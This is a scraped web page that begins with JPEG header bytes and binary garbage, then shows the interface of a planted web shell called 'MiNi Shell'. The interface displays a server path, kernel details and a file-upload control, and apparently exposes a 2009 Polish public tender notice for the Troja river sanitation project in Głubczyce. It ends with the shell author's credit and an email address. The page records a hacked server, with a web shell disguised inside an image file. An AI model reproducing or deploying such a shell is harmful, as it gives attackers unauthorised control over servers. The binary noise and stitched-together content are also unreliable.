JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090602/176676-N-2009.html

<p class="kh_header"><b>Głubczyce: Pełnienie funkcji inwestora zastępczego przy realizacji zadania pn.Sanitacja dorzecza rzeki Troi.</b><br>
<b>Numer ogłoszenia: 176676 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Głubczyckie Wodociągi i Kanalizacja sp. z o.o. , ul. Powstańców 2, 48-100 Głubczyce, woj. opolskie, tel. 077 4852721, faks 077 4852721 wew. 12.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> www.bip.glubczyce.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Prawa Handlowego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inwestora zastępczego przy realizacji zadania pn.Sanitacja dorzecza rzeki Troi..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestorstwo zastępcze na realizację zadania pn.Sanitacja dorzecza rzeki Troi. O wartości wg. kosztorysów inwestorskich 14.043.000,00 zł/netto/ w następujących branżach: 1. instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych i kanalizacyjnych  2. instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych 3. drogowej 4. zagospodarowania terenu   , Do obowiązków inwestora zastępczego należeć będzie m in. koordynacji zadania inwestycyjnego, rozliczenia rzeczowo -fanansowego zadania..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.23.10.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.10.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający  wymaga wniesienia wadium w wysokości 5.000,00zł.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków: O udzielenie zamówienia ubiegać się mogą Wykonawcy, którzy:
Warunki ustawowe: 1. posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień; 2. posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia; 3. znajdują się w sytuacji ekonomicznej i 
finansowej zapewniającej wykonanie zamówienia; 4. nie podlegają wykluczeniu z postępowania. Warunki Zamawiającego: 1.nadzorowanie realizacji co jednego obiektu budowlanego w ciągu ostatnich trzech lat o łącznej wartości co najmniej 6 mln.PLN, potwierdzonych referencjami w których podana będzie wartość nadzorowanych robót, wystawionymi na wykonawcę (tj.inwestor zastępczy-wartość 6 mln dotyczy wartości nadzorowanych obiektów a nie kwoty uzyskanej za pełnienie nadzoru) przez Inwestora Głównego. 2.dysponowanie do wykonania zamówienia osobami posiadającymi uprawnienia budowlane bez ograniczeń do wykonywania samodzielnych funkcji w budownictwie,  zgodnie z art.12 ust.1 ustawy Prawo Budowlane w zakresie wykonywania nadzoru inwestorskiego w specjalnościach, instalacyjnej w zakresie sieci, instalacji  i urządzeń wodociągowych i kanalizacyjnych, instalacyjnej w zakresie sieci instalacji i urządzeń elektrycznych i elektroenergetycznych oraz  drogowej w rozumieniu przepisów o drogach publicznych z wyłączeniem drogowych obiektów inżynierskich oprócz przepustów, wpisanymi na listę członków właściwej izby samorządu zawodowego 3. przeprowadzenie wizji lokalnej przyszłej budowy 4. zaakceptowanie warunków umownych określonych w projekcie umowy. O spełnieniu w/w warunków decydować będzie kompletność i aktualność przedłożonych dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca posiadania uprawnienia do wykonania określonej działalności lub czynności objętych przedmiotem zamówienia oraz nie podlega wykluczeniu z postępowania wykonawca składa : 1) Oświadczenie wykonawcy o spełnieniu warunków określonych w art. 22 ust. 1 pkt.1-3 i art. 24  ustawy Prawo Zamówień publicznych, które stanowi druk nr 2 do SIWZ /dokument ten będzie stanowić załącznik nr  1 do oferty/.
2. Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej , wystawionego nie wcześniej  niż 6 miesięcy przed upływem   terminu składania ofert /dokument ten będzie stanowić załącznik nr 2 do oferty/ w przypadku składania ofert przez spółki cywilne należy  dołączyć również kopię umowy spółki cywilnej. 
3. Aktualne  zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio , że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne lub  zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu wystawione nie wcześniejsza niż 3 miesiące przed upływem terminu składania ofert. /dokument ten będzie stanowić załącznik nr 3 i 4 do oferty/
4. Wykaz osób i podmiotów , które będą wykonywać zamówienie lub będą uczestniczyć w wykonaniu zamówienia w poszczególnych branżach, który stanowi druk nr 3 do SIWZ wraz  informacjami na temat ich kwalifikacji , a także zakresu wykonywanych przez nich czynności z kopiami uprawnień i zaświadczeń z właściwego oddziału Izby Inżynierów Budownictwa ,potwierdzające ich przynależność do tej izby na  dzień  składania ofert /dokument ten będzie stanowić załącznik nr 5 do oferty/
5.  Wykaz nadzorowanych realizacji minimum 1  obiekt budowlany w ostatnich trzech  latach o  łącznej wartości co najmniej 6 mln PLN  który stanowi druk nr 4 do SIWZ wraz z załączeniem dokumentów potwierdzających, że usługi te zostały wykonane należycie /dokument ten będzie stanowić załącznik nr 6 do oferty/
6. Oświadczenie o realizacji zamówienia siłami własnymi, które stanowi druk  nr 5 do SIWZ /dokument ten będzie stanowić załącznik nr 7 do oferty/
7. Aktualny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie działalności gospodarczej - na kwotę nie mniejszą niż 1mln PLN co musi  być jednoznaczne zapisane w przekładanym dokumencie -  w innym przypadku należy dołączyć ogólne warunki ubezpieczenie /dokument ten będzie stanowić załącznik nr 8 do oferty/
8. Podpisany projekt umowy , który stanowi druk nr 6 do SIWZ, wystarczającym będzie dołączenie do oferty parafowanego projektu umowy rozumianego przez Zamawiającego jako akceptacji jego treści i warunków. /dokument ten będzie stanowić załącznik nr 9 do oferty/ 
9. Pełnomocnictwo dla Pełnomocnika wraz z umowa regulującą współpracę podmiotów występujących wspólnie (,winien to być jeden dokument regulujący zasady spółpracy i uprawnienia Wykonawców)- składane tylko w przypadku złożenia oferty przez Wykonawców występujących wspólnie /dokument ten będzie stanowić załącznik nr 10 do oferty/ 
 Wykonawcy, którzy wspólnie ubiegają się o udzielenie zamówienia publicznego   
 ustanawiają pełnomocnika (zgodnie z zasadami określonymi przez Kodeks Cywilny) do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo do  
 reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo należy dołączyć do oferty.
10. W przypadku, gdy w składanej ofercie będą znajdowały się informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów o zwalczaniu nieuczciwej konkurencji, wówczas wystarczy oświadczenie Wykonawców występujących wspólnie o konieczności dochowania tajemnicy odnośnie danych firmy.  Na tę okoliczność Wykonawcy składają stosowne oświadczenie.  Jeżeli oferta nie będzie zawierała takiego oświadczenia wówczas Zamawiający uzna, że informacje zawarte w ofercie nie stanowią tajemnicy handlowej firmy i informacje te zostaną udostępnione innym uczestnikom postępowania.
W przypadku Wykonawców występujących wspólnie dokumenty wymienione w Części IX pkt.1-3 SIWZ,  każdy z Wykonawców (członków konsorcjum) składa oddzielnie, natomiast dokumenty wymienione w pkt. 4-8 Wykonawcy składają wspólnie.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.glubczyce.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Głubczyckie Wodociągi i Kanalizacja Sp. z o.o. , ul. Powstańców 2, 48-100 Głubczyce ,pokój nr 17-18..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.06.2009 godzina 10:15, miejsce: Głubczyckie Wodociągi i Kanalizacja Sp. z o.o., ul.Powstańców 2, 48-100 Głubczyce ,pokój nr 19..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com